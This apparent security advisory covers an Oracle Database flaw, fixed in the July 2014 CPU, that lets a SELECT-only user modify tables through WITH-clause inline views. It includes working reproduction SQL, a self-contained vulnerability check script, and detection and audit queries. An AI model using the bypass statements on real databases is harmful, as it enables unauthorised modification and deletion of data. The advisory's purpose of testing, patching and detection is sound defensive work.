Oracle Database high-risk vulnerability warning!

Source: Internet
Author: User
Tags cve


A high-risk Oracle Database vulnerability has recently been disclosed publicly: a user who holds only SELECT (query) privilege on a table can insert, update, and delete its rows, which is very dangerous. The impact is broad and covers the versions most commonly deployed in China, such as 11.2.0.3, 11.2.0.4, and 12.1.

The vulnerability was fixed in the Oracle Critical Patch Update (CPU) released on July 15, 2014. Any database that has not had that CPU (or a later one) applied is still vulnerable. We strongly recommend checking every Oracle database you operate for this issue.

Yun and emo reproduced the vulnerability in their test environments on versions 11.2.0.3, 11.2.0.4, and 12.1.0.1. You can follow the steps below to check whether your own database is affected.

(Note: the following steps are for reference only. In principle they do not affect the database, but we take no responsibility for any risk arising from running these SQL statements in a production environment.)

1. Create a test user and grant it only the CREATE SESSION privilege.

SQL> create user test_update identified by test_update;

User created.

SQL> grant create session to test_update;

Grant succeeded.

2. Grant the user SELECT on a table (here enmo.t, granted by its owner). Many production environments grant exactly this kind of read-only access, for example to reporting or application accounts.

SQL> grant select on t to test_update;

Grant succeeded.

SQL> select count(*) from t;

  COUNT(*)
----------
       100

3. Connect as the test user and confirm that direct INSERT, UPDATE, and DELETE are denied, as expected.

SQL> conn test_update/test_update
Connected.

SQL> select * from enmo.t where rownum = 1;

        ID
----------
         1

SQL> update enmo.t set id = 1 where id = 1;
update enmo.t set id = 1 where id = 1
*
ERROR at line 1:
ORA-01031: insufficient privileges

4. Wrapping the table in a WITH clause (subquery factoring) inside an inline view bypasses the privilege check completely: the same user, holding only SELECT, can now update, delete, and insert rows.

SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 0 where id = 1;

1 row updated.

SQL> commit;

Commit complete.

SQL> delete (with temp as (select * from enmo.t) select id from temp) where id = 2;

1 row deleted.

SQL> insert into (with temp as (select * from enmo.t) select * from temp) select 2 from enmo.t where id = 3;

1 row created.

5. The problem was fixed in the July 2014 Oracle CPU.

Because many users are unaware of what the CPU contains and never apply it, the issue is high risk in practice. The following shows the response to the same statement after the CPU has been applied:

SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1;
update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1
*
ERROR at line 1:
ORA-01031: insufficient privileges
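The five steps above, consolidated into one SQL*Plus script as an added example (this is not part of the original article). It creates its own throwaway owner schema and table instead of touching enmo.t, so no production data is modified, and it reports the verdict as a row count: 1 means the WITH-clause bypass succeeded and the database is unpatched, 0 means ORA-01031 was raised and the fix is in place. The schema chk_owner, the user chk_reader, both passwords, and the OS-authenticated `connect / as sysdba` login at the end are assumptions to adapt to your environment.

```sql
-- Added example: end-to-end check for the WITH-clause DML privilege bypass.
-- Run in SQL*Plus as a DBA. chk_owner, chk_reader and the passwords are
-- placeholders (assumptions), as is OS-authenticated "connect / as sysdba".
set echo on
whenever sqlerror continue

-- 1. Throwaway owner schema with a small table that stands in for enmo.t
create user chk_owner identified by ChangeMeOwner1;
grant create session, create table, unlimited tablespace to chk_owner;
create table chk_owner.t (id number primary key);
insert into chk_owner.t select level from dual connect by level <= 10;
commit;

-- 2. Reader account: CREATE SESSION plus SELECT on the table, nothing else
create user chk_reader identified by ChangeMeReader1;
grant create session to chk_reader;
grant select on chk_owner.t to chk_reader;

-- 3. As the reader, direct DML must fail with ORA-01031 on every build
connect chk_reader/ChangeMeReader1
update chk_owner.t set id = 0 where id = 1;

-- 4. The same UPDATE through a WITH clause inside an inline view.
--    Unpatched: "1 row updated". Patched (July 2014 CPU or later): ORA-01031.
update (with tmp as (select id from chk_owner.t) select id from tmp)
   set id = 0 where id = 1;

-- Verdict: 1 = vulnerable (the reader modified a row), 0 = not vulnerable.
-- The count is read inside the reader's own, still uncommitted, transaction.
select count(*) as rows_changed_by_reader
  from chk_owner.t
 where id = 0;

-- Undo the test change so the table is left exactly as it was
rollback;

-- 5. Cleanup as DBA (assumes OS authentication; otherwise connect as any DBA user)
connect / as sysdba
drop user chk_reader cascade;
drop user chk_owner cascade;
```

Run it as `sqlplus / as sysdba @check_with_bypass.sql` (file name is yours to choose) and read the ROWS_CHANGED_BY_READER value; the ORA-01031 printed in step 3 is expected on every build and is not the verdict.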

Warning: many users pay too little attention to the CPU security patches, so this high-risk issue may still be present in their systems. We recommend taking this vulnerability seriously and applying the appropriate measures promptly. The CVE identifiers associated with this issue include: CVE-2013-3751, CVE-2014-4236, CVE-2014-4237, CVE-2014-4245, and CVE-2013-3774.

For more information, see the Oracle CPU page:

http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
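Two follow-up checks a DBA or SOC analyst would want after reading the warning above, as an added example that is not part of the original article: whether the database records any CPU/PSU application at all, and whether the bypass shape (DML applied to an inline view whose text starts with WITH) has appeared in the shared SQL area. It assumes the standard data dictionary views DBA_REGISTRY_HISTORY (11.2), DBA_REGISTRY_SQLPATCH (12.1) and V$SQL; the SYS/SYSTEM exclusion list and the audited account chk_reader are placeholders.

```sql
-- Added example: patch inventory and hunting queries, run as a DBA account.
-- All object names are the standard dictionary views; chk_reader and the
-- schema exclusion list are placeholders (assumptions).

-- (a) Patch history. On 11.2 every catbundle run (CPU or PSU) is recorded
--     here; no row dated on or after July 2014 means the fix is most likely
--     missing and the reproduction check above should be run.
select action_time, action, version, id, comments
  from dba_registry_history
 order by action_time;

-- On 12.1 datapatch records its runs in DBA_REGISTRY_SQLPATCH instead.
select action_time, action, patch_id, status, description
  from dba_registry_sqlpatch
 order by action_time;

-- (b) Hunt for the bypass shape: UPDATE / DELETE / INSERT INTO applied to an
--     inline view that begins with WITH. A hit parsed by a schema that does
--     not own the target table deserves a closer look.
select sql_id, parsing_schema_name, first_load_time, executions, sql_text
  from v$sql
 where regexp_like(sql_text,
         '^\s*(update|delete(\s+from)?|insert\s+into)\s*\(\s*with\s', 'i')
   and parsing_schema_name not in ('SYS', 'SYSTEM')   -- placeholder exclusions
 order by first_load_time;

-- (c) V$SQL is a cache and ages out. For durable evidence, audit DML issued
--     by the low-privilege accounts of interest (chk_reader is a placeholder;
--     AUDIT_TRAIL must be set to DB or DB,EXTENDED for records to be written).
audit update table, delete table, insert table by chk_reader by access;
```

Query (b) only sees statements still in the library cache, so an empty result is not proof of absence; the audit in (c), or the same pattern applied to SQL_TEXT in DBA_AUDIT_TRAIL when AUDIT_TRAIL is DB,EXTENDED, is what gives a retained record.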
